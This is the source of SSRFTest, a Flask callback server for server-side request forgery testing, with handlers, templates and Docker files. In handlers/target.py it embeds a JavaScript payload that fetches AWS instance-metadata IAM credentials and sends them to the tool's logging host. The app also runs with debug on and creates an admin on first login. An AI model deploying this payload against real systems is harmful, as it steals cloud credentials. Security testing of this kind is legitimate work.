├── handlers ├── __init__.py ├── index.py ├── dashboard.py ├── auth.py └── target.py ├── prestart.sh ├── run-debug.sh ├── static └── favicon.png ├── templates ├── index.html ├── dashboard │ ├── index.html │ └── newTarget.html ├── auth │ ├── login.html │ └── register.html ├── target │ └── index.html └── base.html ├── dbrepl.py ├── Dockerfile ├── uwsgi.ini ├── requirements.txt ├── docker-compose.yml ├── readme.md ├── license.txt ├── model.py ├── main.py ├── handler.py └── metamodel.py /handlers/__init__.py: -------------------------------------------------------------------------------- 1 | import index, auth, dashboard, target 2 | -------------------------------------------------------------------------------- /prestart.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sysctl -w net.core.somaxconn=65536 4 | -------------------------------------------------------------------------------- /run-debug.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | FLASK_ENV=development python main.py -------------------------------------------------------------------------------- /static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/daeken/SSRFTest/HEAD/static/favicon.png -------------------------------------------------------------------------------- /templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block scripts %} 3 | {% endblock %} 4 | {% block body %} 5 |

SSRFTest

6 |

Blah blah blah

7 | {% endblock %} 8 | -------------------------------------------------------------------------------- /dbrepl.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python -i 2 | from metamodel import createLocalSession 3 | from main import app 4 | app.test_request_context('/').__enter__() 5 | createLocalSession() 6 | from model import * 7 | -------------------------------------------------------------------------------- /handlers/index.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | 3 | @handler('index', authed=False) 4 | def get_index(): 5 | if session.user is not None: 6 | redirect(handler.dashboard.get_index) 7 | return dict(page='home') 8 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python2.7 2 | 3 | WORKDIR /app 4 | 5 | ADD requirements.txt /app/ 6 | 7 | RUN pip install --trusted-host pypi.python.org -r requirements.txt 8 | 9 | ADD . 
/app 10 | -------------------------------------------------------------------------------- /uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | listen = 16384 5 | lazy-apps = true 6 | master = true 7 | processes = 100 8 | max-requests = 1000 9 | logto = /var/log/uwsgi.log 10 | harakiri = 45 11 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | bcrypt==3.1.4 2 | certifi==2018.4.16 3 | cffi==1.11.5 4 | chardet==3.0.4 5 | click==6.7 6 | Flask==1.0.2 7 | idna==2.7 8 | itsdangerous==0.24 9 | Jinja2==2.10 10 | MarkupSafe==1.0 11 | pycparser==2.18 12 | six==1.11.0 13 | SQLAlchemy==1.2.10 14 | urllib3==1.23 15 | Werkzeug==0.14.1 16 | psycopg2 17 | flask-cors 18 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.1' 2 | 3 | services: 4 | db: 5 | image: postgres 6 | restart: always 7 | environment: 8 | POSTGRES_PASSWORD: dbpassword 9 | volumes: 10 | - db-data:/var/lib/postgresql/data 11 | 12 | web: 13 | privileged: true 14 | image: ssrfweb 15 | restart: always 16 | ports: 17 | - 80:80 18 | 19 | volumes: 20 | db-data: 21 | -------------------------------------------------------------------------------- /templates/dashboard/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | New Target 4 | {% if len(targets) %} 5 | 6 | 7 | 8 | 9 | 10 | {% for (link, name, lastHit) in targets %} 11 | 12 | {% endfor %} 13 | 14 |
NameLast Hit
{{ name }}{{ lastHit }}
15 | {% endif %} 16 | {% endblock %} -------------------------------------------------------------------------------- /templates/dashboard/newTarget.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | {% if error %} 4 |
{{ error }}
5 | {% endif %} 6 |

New Target

7 |
$CSRF$ 8 |
9 | 10 |
11 | 12 |
13 |
14 | 15 |
16 | {% endblock %} -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | Welcome to SSRFTest 2 | =================== 3 | 4 | Installation 5 | ------------ 6 | 7 | 1. Clone the repo 8 | 2. Generate a random 64-character hex string from a cryptographically secure source, e.g. run `import os, binascii; print(binascii.hexlify(os.urandom(32)).decode())` at the Python interpreter (do not use the `random` module for this: its output is predictable, and this value signs the session cookies) 9 | 3. Put that string into main.py on the line `app.secret_key = key = 'SECRET HERE'` 10 | 4. (Optional) Change the database password in docker-compose.yml and model.py -- default is `dbpassword`. This is not exposed to the outside so it's largely irrelevant 11 | 5. Search for `ssrftest.com` and replace it with the IP/domain you're hosting this on 12 | 6. Install Docker and Docker Compose 13 | 7. Build the web image under the name `ssrfweb`, which docker-compose.yml expects: run `./build-docker.sh` if your checkout includes it, otherwise `docker build -t ssrfweb .` 14 | 8. Run `docker-compose up`. Note that the session cookie is named `__Host-session` and marked Secure, so browsers only keep it over HTTPS; serve the site through a TLS-terminating proxy or logins will not stick 15 | 9. ??? 16 | 10. Profit 17 | -------------------------------------------------------------------------------- /templates/auth/login.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | {% if error %} 4 |
{{ error }}
5 | {% endif %} 6 |
7 |

Log in

8 |
$CSRF$ 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 |
18 | 19 |
20 |
21 | 22 |
23 |
24 | {% endblock %} -------------------------------------------------------------------------------- /license.txt: -------------------------------------------------------------------------------- 1 | Copyright 2019 Cody Brocious 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
-------------------------------------------------------------------------------- /handlers/dashboard.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | 3 | errors = [ 4 | 'Target name required', 5 | 'You have a target with this name already' 6 | ] 7 | 8 | linkchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_' 9 | 10 | @handler('dashboard/index') 11 | def get_index(): 12 | return dict(page='home', targets=[ 13 | (target.link, target.name, sorted(hit.at for hit in target.hits)[-1] if len(target.hits) else None) 14 | for target in session.user.targets 15 | ]) 16 | 17 | @handler('dashboard/newTarget') 18 | def get_newTarget(error=None): 19 | return dict(error=errors[int(error)] if error is not None else None) 20 | 21 | @handler 22 | def post_newTarget(name): 23 | if name is None or name.strip() == '': 24 | redirect(get_newTarget.url(error=0)) 25 | elif Target.one(user_id=session.user.id, name=name): 26 | redirect(get_newTarget.url(error=1)) 27 | while True: 28 | link = ''.join(linkchars[random.randrange(len(linkchars))] for i in xrange(5)) 29 | if Target.one(link=link) is None: 30 | break 31 | Target.add(session.user, link, name) 32 | redirect(handler.target.get_index.url(link=link)) 33 | -------------------------------------------------------------------------------- /templates/target/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 |

{{ name }}

4 |

Hit Link:

5 |

IFrame:

6 |

Script:

7 |

Image:

8 | {% if len(logs) %} 9 |

Log Messages

10 | 11 | 12 | 13 | 14 | 15 | {% for (at, message) in logs %} 16 | 17 | {% endfor %} 18 | 19 |
DateMessage
{{ at }}
{{ message }}
20 | {% endif %} 21 | {% if len(hits) %} 22 |

Hits

23 | 24 | 25 | 26 | 27 | 28 | {% for (at, req) in hits %} 29 | 30 | {% endfor %} 31 | 32 |
DateRequest
{{ at }}
{{ req }}
33 | {% endif %} 34 | {% endblock %} 35 | -------------------------------------------------------------------------------- /templates/auth/register.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block body %} 3 | {% if error %} 4 |
{{ error }}
5 | {% endif %} 6 |
7 |

Register

8 |
$CSRF$ 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 |
18 | 19 |
20 |
21 |
22 | 23 |
24 | 25 |
26 |
27 |
28 | 29 |
30 | 31 |
32 |
33 | 34 |
35 |
36 | {% endblock %} 37 | -------------------------------------------------------------------------------- /handlers/auth.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | import bcrypt, random 3 | 4 | errors = [ 5 | 'You must be logged in to view that page', 6 | 'Username or email in use', 7 | 'Password too short', 8 | 'Passwords do not match', 9 | 'Invalid username or password' 10 | ] 11 | 12 | @handler('auth/login', authed=False) 13 | def get_index(error=None): 14 | if session.user is not None: 15 | redirect(handler.index.get_index) 16 | return dict(page='login', error=errors[int(error)] if error is not None else None) 17 | 18 | @handler(authed=False) 19 | def get_logout(): 20 | del session['userId'] 21 | redirect('/') 22 | 23 | @handler('auth/register', authed=False) 24 | def get_register(error=None): 25 | if session.user is not None: 26 | redirect(handler.index.get_index) 27 | return dict(page='register', error=errors[int(error)] if error is not None else None) 28 | 29 | @handler(authed=False) 30 | def post_register(username, password, password2, email): 31 | if session.user is not None: 32 | redirect(handler.index.get_index) 33 | if User.one(username=username) or User.one(email=email): 34 | redirect(get_register.url(error=1)) 35 | elif len(password) < 8: 36 | redirect(get_register.url(error=2)) 37 | elif password != password2: 38 | redirect(get_register.url(error=3)) 39 | 40 | user = User.add(username, password, email, False) 41 | session['userId'] = user.id 42 | redirect(handler.index.get_index) 43 | 44 | @handler(authed=False, CSRFable=True) 45 | def post_login(username, password): 46 | if session.user is not None: 47 | redirect(handler.index.get_index) 48 | user = User.find(username, password) 49 | 50 | if user == None: 51 | redirect(get_index.url(error=4)) 52 | else: 53 | session['userId'] = user.id 54 | 55 | redirect(handler.index.get_index) 56 | 
-------------------------------------------------------------------------------- /handlers/target.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | 3 | @handler('target/index') 4 | def get_index(link): 5 | if link is None: 6 | return 'Fail' 7 | target = Target.one(user_id=session.user.id, link=link) 8 | if target is None: 9 | return 'Unknown link' 10 | return dict( 11 | name=target.name, 12 | logs=[(log.at, log.message) for log in target.logs[::-1]], 13 | hits=[(hit.at, hit.request) for hit in target.hits[::-1]] 14 | ) 15 | 16 | js = '''function log(data) { 17 | var sreq = new XMLHttpRequest(); 18 | sreq.open('GET', 'http://ssrftest.com/target/log?link=LINK&data=' + encodeURI(data), true); 19 | sreq.send(); 20 | } 21 | 22 | function get(url) { 23 | try { 24 | var req = new XMLHttpRequest(); 25 | req.open('GET', url, false); 26 | req.send(null); 27 | if(req.status == 200) 28 | return req.responseText; 29 | } catch(err) { 30 | } 31 | return null; 32 | } 33 | 34 | log('Triggered in ' + window.location.href); 35 | var role = get('http://169.254.169.254/latest/meta-data/iam/security-credentials/'); 36 | if(role !== null) { 37 | log('Fetched AWS role: ' + role); 38 | log('With AWS credentials: ' + get('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role)); 39 | } else 40 | log('Failed to get AWS role'); 41 | ''' 42 | 43 | def hit(link, ext, req): 44 | if link is None: 45 | return 'Fail' 46 | target = Target.one(link=link) 47 | if target is None: 48 | return 'Unknown link' 49 | Hit.add(target, req) 50 | 51 | if ext == 'js': 52 | return Response(js.replace('LINK', link), mimetype='application/javascript') 53 | return Response('' % link, mimetype='text/html') 54 | 55 | @handler(authed=False) 56 | def get_log(link, data): 57 | if link is None: 58 | return 'Fail' 59 | target = Target.one(link=link) 60 | if target is None: 61 | return 'Unknown link' 62 | Log.add(target, data) 63 | return '' 
64 | -------------------------------------------------------------------------------- /templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SSRFTest 6 | 7 | 8 | 9 | {% block scripts %} 10 | {% endblock %} 11 | 12 | 13 |
14 | 34 |
35 | 36 |
37 | {% block body %} 38 | {% endblock %} 39 | 40 |
41 | 42 | 45 |
46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /model.py: -------------------------------------------------------------------------------- 1 | import math, hashlib, json, os, random 2 | from datetime import datetime, timedelta 3 | import sqlalchemy as sa 4 | from sqlalchemy.orm import relationship 5 | from sqlalchemy.types import * 6 | from metamodel import * 7 | import bcrypt 8 | 9 | @Model 10 | def Log(): 11 | target_id = ForeignKey(Integer, 'Target.id') 12 | message = Unicode(65536) 13 | at = DateTime 14 | 15 | @staticmethod 16 | def add(target, data): 17 | with transact: 18 | return Log.create( 19 | target_id=target.id, 20 | message=data, 21 | at=datetime.now() 22 | ) 23 | 24 | @Model 25 | def Hit(): 26 | target_id = ForeignKey(Integer, 'Target.id') 27 | request = Unicode(65536) 28 | at = DateTime 29 | 30 | @staticmethod 31 | def add(target, request): 32 | with transact: 33 | return Hit.create( 34 | target_id=target.id, 35 | request=request, 36 | at=datetime.now() 37 | ) 38 | 39 | @Model 40 | def Target(): 41 | user_id = ForeignKey(Integer, 'User.id') 42 | enabled = Boolean 43 | link = String(5) 44 | name = Unicode 45 | 46 | logs = Log.relation(backref='target') 47 | hits = Hit.relation(backref='target') 48 | 49 | @staticmethod 50 | def add(user, link, name): 51 | with transact: 52 | return Target.create( 53 | enabled=True, 54 | user_id=user.id, 55 | link=link, 56 | name=name 57 | ) 58 | 59 | @Model 60 | def User(): 61 | enabled = Boolean 62 | admin = Boolean 63 | username = Unicode(255) 64 | password = String(88) 65 | email = String 66 | registrationDate = DateTime 67 | 68 | targets = Target.relation(backref='user') 69 | 70 | def setPassword(self, password): 71 | with transact: 72 | self.password = User.hash(password) 73 | 74 | @staticmethod 75 | def hash(password): 76 | return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(12)) 77 | 78 | @staticmethod 79 | def checkHash(hash, password): 
80 | try: 81 | hash = hash.encode('utf-8') 82 | return bcrypt.hashpw(password.encode('utf-8'), hash) == hash 83 | except: 84 | return False 85 | 86 | @staticmethod 87 | def add(username, password, email, admin): 88 | if User.one(enabled=True, username=username) or User.one(enabled=True, email=email): 89 | return None 90 | with transact: 91 | return User.create( 92 | enabled=True, 93 | username=username, 94 | password=User.hash(password), 95 | email=email, 96 | admin=admin, 97 | registrationDate=datetime.now() 98 | ) 99 | 100 | @staticmethod 101 | def find(username, password): 102 | if username == None or password == None: 103 | return None 104 | user = User.one(enabled=True, username=username) 105 | if user and User.checkHash(user.password, password): 106 | return user 107 | if not user and len(User.all()) == 0: 108 | return User.add(username, password, 'admin@admin', True) 109 | return None 110 | 111 | db = 'postgresql://postgres:dbpassword@db/postgres' 112 | 113 | @setup(db) 114 | def init(): 115 | pass 116 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import os 2 | from flask import Flask, request 3 | from flask_cors import CORS 4 | from werkzeug.routing import Rule 5 | import handler 6 | import handlers 7 | from handlers import * 8 | from metamodel import createLocalSession, closeLocalSession 9 | 10 | app = Flask(__name__) 11 | CORS(app, resources={r'/x/*': {'origins' : '*'}, r'/target/log': {'origins' : '*'}}) 12 | app.debug = True 13 | app.secret_key = key = 'SECRET HERE' 14 | app.config.update( 15 | SESSION_COOKIE_NAME='__Host-session', 16 | SESSION_COOKIE_SECURE=True, 17 | SESSION_COOKIE_HTTPONLY=True, 18 | SESSION_COOKIE_SAMESITE='Lax' 19 | ) 20 | 21 | @app.teardown_request 22 | def session_clear(exception=None): 23 | if not hasattr(request, '_session'): 24 | return 25 | request._session.remove() 26 | if exception and 
request._session.is_active: 27 | request._session.rollback() 28 | 29 | def reroute(noId, withId): 30 | def sub(id=None, *args, **kwargs): 31 | try: 32 | if id == None: 33 | return noId(*args, **kwargs) 34 | else: 35 | return withId(id, *args, **kwargs) 36 | except: 37 | import traceback 38 | traceback.print_exc() 39 | sub.func_name = '__reroute_' + noId.func_name 40 | return sub 41 | 42 | for module, sub in handler.all.items(): 43 | for name, (method, args, rpc, (noId, withId)) in sub.items(): 44 | if module == 'index': 45 | route = '/' 46 | trailing = True 47 | else: 48 | route = '/%s' % module 49 | trailing = False 50 | if name != 'index': 51 | if not trailing: 52 | route += '/' 53 | route += '%s' % name 54 | trailing = False 55 | 56 | if noId != None and withId != None: 57 | func = reroute(noId, withId) 58 | elif noId != None: 59 | func = noId 60 | else: 61 | func = withId 62 | 63 | if withId != None: 64 | iroute = route 65 | if not trailing: 66 | iroute += '/' 67 | iroute += '' 68 | app.route(iroute, methods=[method])(func) 69 | 70 | if noId != None: 71 | app.route(route, methods=[method])(func) 72 | 73 | @app.route('/favicon.ico') 74 | def favicon(): 75 | return app.send_static_file('favicon.png') 76 | @app.route('/css/') 77 | @app.route('/fonts/') 78 | @app.route('/img/') 79 | @app.route('/js/') 80 | @app.route('/js//') 81 | def staticfiles(fn, dir=None): 82 | if '..' in fn or (dir is not None and '..' in dir): 83 | return 'There is only one god and his name is Directory Traversal. 
And there is only one thing we say to Directory Traversal: "Not today."' 84 | return app.send_static_file(request.path[1:]) 85 | 86 | rpcStubTemplate = '''%s: function(%s, callback) { 87 | $.ajax(%r, 88 | { 89 | success: function(data) { 90 | if(callback !== undefined) 91 | callback(data) 92 | }, 93 | error: function() { 94 | if(callback !== undefined) 95 | callback() 96 | }, 97 | dataType: 'json', 98 | data: {csrf: $csrf, %s}, 99 | type: 'POST' 100 | } 101 | ) 102 | }''' 103 | cachedRpc = None 104 | @app.route('/rpc.js') 105 | def rpc(): 106 | global cachedRpc 107 | if cachedRpc: 108 | return cachedRpc 109 | 110 | modules = [] 111 | for module, sub in handler.all.items(): 112 | module = [module] 113 | for name, (method, args, rpc, funcs) in sub.items(): 114 | if not rpc: 115 | continue 116 | func = funcs[0] if funcs[0] else funcs[1] 117 | name = name[4:] 118 | method = rpcStubTemplate % ( 119 | name, ', '.join(args), 120 | func.url(), 121 | ', '.join('%s: %s' % (arg, arg) for arg in args) 122 | ) 123 | module.append(method) 124 | if len(module) > 1: 125 | modules.append(module) 126 | 127 | cachedRpc = 'var $rpc = {%s};' % (', '.join('%s: {%s}' % (module[0], ', '.join(module[1:])) for module in modules)) 128 | return cachedRpc 129 | 130 | @app.route('/scripts/') 131 | def script(fn): 132 | try: 133 | if not fn.endswith('.js'): 134 | return '' 135 | 136 | fn = 'scripts/' + fn[:-3] 137 | if os.path.exists(fn + '.js'): 138 | return file(fn + '.js', 'rb').read() 139 | return '' 140 | except: 141 | import traceback 142 | traceback.print_exc() 143 | 144 | app.url_map.add(Rule('/x/', endpoint='hit')) 145 | 146 | @app.endpoint('hit') 147 | def hit(link): 148 | if '.' 
in link: 149 | link, ext = link.split('.', 1) 150 | else: 151 | ext = '' 152 | 153 | req = '%s %s HTTP/1.1\r\n' % (request.method, request.url) 154 | for k, v in request.headers: 155 | req += '%s: %s\r\n' % (k, v) 156 | req += '\r\n' 157 | req += request.get_data() 158 | 159 | createLocalSession() 160 | try: 161 | ret = handlers.target.hit(link, ext, req) 162 | except: 163 | closeLocalSession(True) 164 | raise 165 | else: 166 | closeLocalSession(False) 167 | return ret 168 | 169 | if __name__=='__main__': 170 | app.run(host='') 171 | -------------------------------------------------------------------------------- /handler.py: -------------------------------------------------------------------------------- 1 | import os 2 | from json import dumps 3 | from flask import abort, make_response, render_template, request, session, Response 4 | from flask import redirect as _redirect 5 | from werkzeug.exceptions import HTTPException 6 | from urllib import quote, urlencode 7 | from datetime import datetime, timedelta 8 | from metamodel import createLocalSession, closeLocalSession 9 | from model import * 10 | 11 | class DictObject(dict): 12 | pass 13 | 14 | class StrObject(str): 15 | pass 16 | 17 | all = {} 18 | 19 | def handler(_tpl=None, _json=False, CSRFable=False, authed=True, admin=False): 20 | def sub(func): 21 | ofunc = func 22 | while hasattr(func, '__delegated__'): 23 | func = func.__delegated__ 24 | sofunc = func 25 | 26 | name = func.func_name 27 | rpc = False 28 | stpl = _tpl 29 | json = _json 30 | if name.startswith('get_'): 31 | name = name[4:] 32 | method = 'GET' 33 | elif name.startswith('post_'): 34 | method = 'POST' 35 | elif name.startswith('rpc_'): 36 | method = 'POST' 37 | rpc = json = True 38 | stpl = None 39 | else: 40 | raise Exception('All handlers must be marked get_, post_, or rpc_.') 41 | 42 | module = func.__module__.split('.')[-1] 43 | if not module in all: 44 | all[module] = DictObject() 45 | setattr(handler, module, all[module]) 46 | args = 
func.__code__.co_varnames[:func.__code__.co_argcount] 47 | hasId = len(args) > 0 and args[0] == 'id' and not rpc 48 | 49 | def func(id=None): 50 | createLocalSession() 51 | try: 52 | tpl = stpl 53 | if 'csrf' not in session: 54 | token = os.urandom(16) 55 | session['csrf'] = ''.join('%02x' % ord(c) for c in token) 56 | if not CSRFable and method == 'POST' and \ 57 | ('csrf' not in request.form or request.form['csrf'] != session['csrf']): 58 | abort(403) 59 | if 'userId' in session and session['userId']: 60 | session.user = User.one(id=int(session['userId'])) 61 | else: 62 | session.user = None 63 | if admin and (session.user == None or not session.user.admin): 64 | return abort(404) 65 | elif authed and session.user == None: 66 | return _redirect(handler.auth.get_index.url(error=0)) 67 | params = request.form if method == 'POST' else request.args 68 | kwargs = {} 69 | for i, arg in enumerate(args): 70 | if i == 0 and arg == 'id' and not rpc: 71 | continue 72 | if arg in params: 73 | kwargs[arg] = params[arg] 74 | elif arg in request.files: 75 | kwargs[arg] = request.files[arg] 76 | else: 77 | assert not rpc # RPC requires all arguments. 
78 | 79 | try: 80 | if hasId and id != None: 81 | ret = ofunc(int(id), **kwargs) 82 | else: 83 | ret = ofunc(**kwargs) 84 | except RedirectException, r: 85 | return _redirect(r.url) 86 | except TemplateException, t: 87 | tpl = t.tpl 88 | ret = t.args 89 | if json: 90 | ret = dumps(ret) 91 | elif tpl != None: 92 | if isinstance(ret, str) or isinstance(ret, unicode): 93 | return ret 94 | if ret == None: 95 | ret = {} 96 | sret = ret 97 | ret = kwargs 98 | ret['handler'] = handler 99 | ret['request'] = request 100 | ret['session'] = session 101 | ret['len'] = len 102 | ret['int'] = int 103 | ret['float'] = float 104 | ret.update(sret) 105 | ret = render_template(tpl + '.html', **ret) 106 | csrf = '' % session['csrf'] 107 | ret = ret.replace('$CSRF$', csrf) 108 | 109 | ret = make_response(ret, 200) 110 | if hasattr(request, '_headers'): 111 | for k, v in request._headers.items(): 112 | ret.headers[k] = v 113 | ret.headers['X-Frame-Options'] = 'sameorigin' 114 | except: 115 | closeLocalSession(True) 116 | raise 117 | else: 118 | closeLocalSession(False) 119 | return ret 120 | 121 | func.func_name = '__%s__%s__' % (module, name) 122 | 123 | def url(_id=None, **kwargs): 124 | if module == 'index': 125 | url = '/' 126 | trailing = True 127 | else: 128 | url = '/%s' % module 129 | trailing = False 130 | if name != 'index': 131 | if not trailing: 132 | url += '/' 133 | url += '%s' % name 134 | trailing = False 135 | if _id != None: 136 | if not trailing: 137 | url += '/' 138 | url += quote(str(_id)) 139 | if len(kwargs): 140 | url += '?' 
141 | url += urlencode(dict((k, str(v)) for k, v in kwargs.items())) 142 | return url 143 | 144 | ustr = StrObject(url()) 145 | ustr.__call__ = ofunc 146 | ustr.url = url 147 | func.url = url 148 | if not name in all[module]: 149 | all[module][name] = method, args, rpc, [None, None] 150 | if hasId and not rpc: 151 | all[module][name][3][1] = func 152 | else: 153 | all[module][name][3][0] = func 154 | setattr(all[module], sofunc.func_name, ustr) 155 | return ustr 156 | 157 | if _tpl != None and hasattr(_tpl, '__call__'): 158 | func = _tpl 159 | _tpl = None 160 | return sub(func) 161 | return sub 162 | 163 | def sessid(): 164 | if 'sessid' not in session: 165 | token = os.urandom(8) 166 | session['sessid'] = ''.join('%02x' % ord(c) for c in token) 167 | return session['sessid'] 168 | handler.sessid = sessid 169 | 170 | def header(key, value): 171 | if not hasattr(request, '_headers'): 172 | request._headers = {} 173 | 174 | request._headers[key] = value 175 | handler.header = header 176 | 177 | class RedirectException(Exception): 178 | def __init__(self, url): 179 | self.url = url 180 | 181 | def redirect(url, _id=None, **kwargs): 182 | if hasattr(url, '__call__') and hasattr(url, 'url'): 183 | url = url.url(_id, **kwargs) 184 | print 'Redirecting to', url 185 | raise RedirectException(url) 186 | 187 | class TemplateException(Exception): 188 | def __init__(self, tpl, args): 189 | self.tpl, self.args = tpl, args 190 | 191 | def templatize(tpl, **args): 192 | raise TemplateException(tpl, args) 193 | -------------------------------------------------------------------------------- /metamodel.py: -------------------------------------------------------------------------------- 1 | import sqlalchemy as sa 2 | from sqlalchemy import orm 3 | from sqlalchemy.types import Integer 4 | from sqlalchemy.sql.type_api import TypeEngine 5 | from sqlalchemy.orm import scoped_session, sessionmaker 6 | from sqlalchemy.orm.attributes import QueryableAttribute 7 | from flask import request 
8 | import sys 9 | 10 | class SessionProxy(object): 11 | def __getattr__(self, name): 12 | return getattr(request._session, name) 13 | 14 | def __enter__(self): 15 | if not hasattr(request, '_inTransact'): 16 | request._inTransact = 0 17 | request._inTransact += 1 18 | 19 | def __exit__(self, type, value, traceback): 20 | request._inTransact -= 1 21 | if request._inTransact > 0: 22 | if type != None: 23 | raise 24 | return 25 | if type == None: 26 | try: 27 | request._session.commit() 28 | except: 29 | request._session.rollback() 30 | raise 31 | else: 32 | request._session.rollback() 33 | raise 34 | 35 | def createLocalSession(): 36 | request._session = scoped_session(sessionmaker()) 37 | request._session.configure(bind=engine) 38 | 39 | def closeLocalSession(didExcept): 40 | request._session.remove() 41 | if didExcept and request._session.is_active: 42 | request._session.rollback() 43 | 44 | transact = SessionProxy() 45 | metadata = sa.MetaData() 46 | 47 | # Monkey patched into Model-decorated classes 48 | @classmethod 49 | def relation(cls, *args, **kwargs): 50 | return orm.relation(cls, *args, **kwargs) 51 | 52 | 53 | @classmethod 54 | def create(cls, **kwargs): 55 | with transact: 56 | obj = cls() 57 | for k, v in kwargs.items(): 58 | setattr(obj, k, v) 59 | transact.add(obj) 60 | return obj 61 | 62 | 63 | def update(self, **kwargs): 64 | for k, v in kwargs.items(): 65 | setattr(self, k, v) 66 | return self 67 | 68 | 69 | @classmethod 70 | def all(cls): 71 | retry = 10 72 | while retry: 73 | try: 74 | with transact: 75 | return transact.query(cls).all() 76 | except: 77 | retry -= 1 78 | 79 | 80 | def genFilter(cls, kwargs): 81 | if len(kwargs) == 1: 82 | k, v = kwargs.items()[0] 83 | return getattr(cls, k) == v 84 | 85 | filters = [] 86 | for k, v in kwargs.items(): 87 | filters.append(getattr(cls, k) == v) 88 | return sa.and_(*filters) 89 | 90 | 91 | @classmethod 92 | def some(cls, **kwargs): 93 | retry = 10 94 | while retry: 95 | try: 96 | with transact: 97 | 
filter = genFilter(cls, kwargs) 98 | return transact.query(cls).filter(filter).all() 99 | except: 100 | retry -= 1 101 | 102 | @classmethod 103 | def one(cls, **kwargs): 104 | retry = 10 105 | while retry: 106 | try: 107 | with transact: 108 | filter = genFilter(cls, kwargs) 109 | return transact.query(cls).filter(filter).one() 110 | except: 111 | retry -= 1 112 | 113 | 114 | def Model(func): 115 | cframe = [None] 116 | def trace(frame, event, arg): 117 | if cframe[0] is None: 118 | cframe[0] = frame 119 | sys.settrace(trace) 120 | func() 121 | sys.settrace(None) 122 | 123 | frame = cframe[0] 124 | names = list(func.func_code.co_varnames) 125 | elems = {name : frame.f_locals[name] for name in names} 126 | 127 | cls = type(func.__name__, (object, ), elems) 128 | cls._fields = names 129 | cls.create = create 130 | cls.update = update 131 | cls.all = all 132 | cls.some = some 133 | cls.one = one 134 | cls.relation = relation 135 | Model.classes.append(cls) 136 | return cls 137 | Model.classes = [] 138 | 139 | engine = None 140 | 141 | 142 | def setup(db): 143 | global engine 144 | engine = sa.create_engine(db, client_encoding='utf8') 145 | metadata.bind = engine 146 | 147 | initialized = False 148 | 149 | for model in Model.classes: 150 | name = model.__name__ 151 | params = [] 152 | for field in dir(model): 153 | value = getattr(model, field) 154 | if isinstance(value, PrimaryKey): 155 | params = [field] + params 156 | else: 157 | params.append(field) 158 | 159 | columns = [] 160 | columns.append(sa.Column('id', Integer, primary_key=True)) 161 | relations = {} 162 | for field in params: 163 | value = getattr(model, field) 164 | if isinstance(value, Modifier): 165 | columns.append(value.build(field)) 166 | delattr(model, field) 167 | elif (isinstance(value, type) or isinstance(value, TypeEngine)) and field != '__class__': 168 | columns.append(sa.Column(field, value)) 169 | delattr(model, field) 170 | elif isinstance(value, orm.properties.RelationshipProperty): 171 | 
relations[field] = value 172 | delattr(model, field) 173 | elif field in model._fields: 174 | model._fields.remove(field) 175 | 176 | table = sa.Table(name, metadata, *columns) 177 | orm.mapper(model, table, properties=relations) 178 | if table.exists(): 179 | initialized = True 180 | 181 | metadata.create_all() 182 | 183 | def sub(func): 184 | if not initialized: 185 | func() 186 | 187 | return sub 188 | 189 | 190 | class Modifier(object): 191 | pass 192 | 193 | 194 | class PrimaryKey(Modifier): 195 | def __init__(self, type): 196 | self.type = type 197 | 198 | def build(self, name): 199 | return sa.Column(name, self.type, primary_key=True) 200 | 201 | 202 | class ForeignKey(Modifier): 203 | def __init__(self, type, ref, *args, **kwargs): 204 | self.type, self.ref = type, ref 205 | self.args, self.kwargs = args, kwargs 206 | 207 | def build(self, name): 208 | return sa.Column(name, self.type, sa.ForeignKey(self.ref), *self.args, **self.kwargs) 209 | 210 | 211 | class Nullable(Modifier): 212 | def __init__(self, type, *args, **kwargs): 213 | 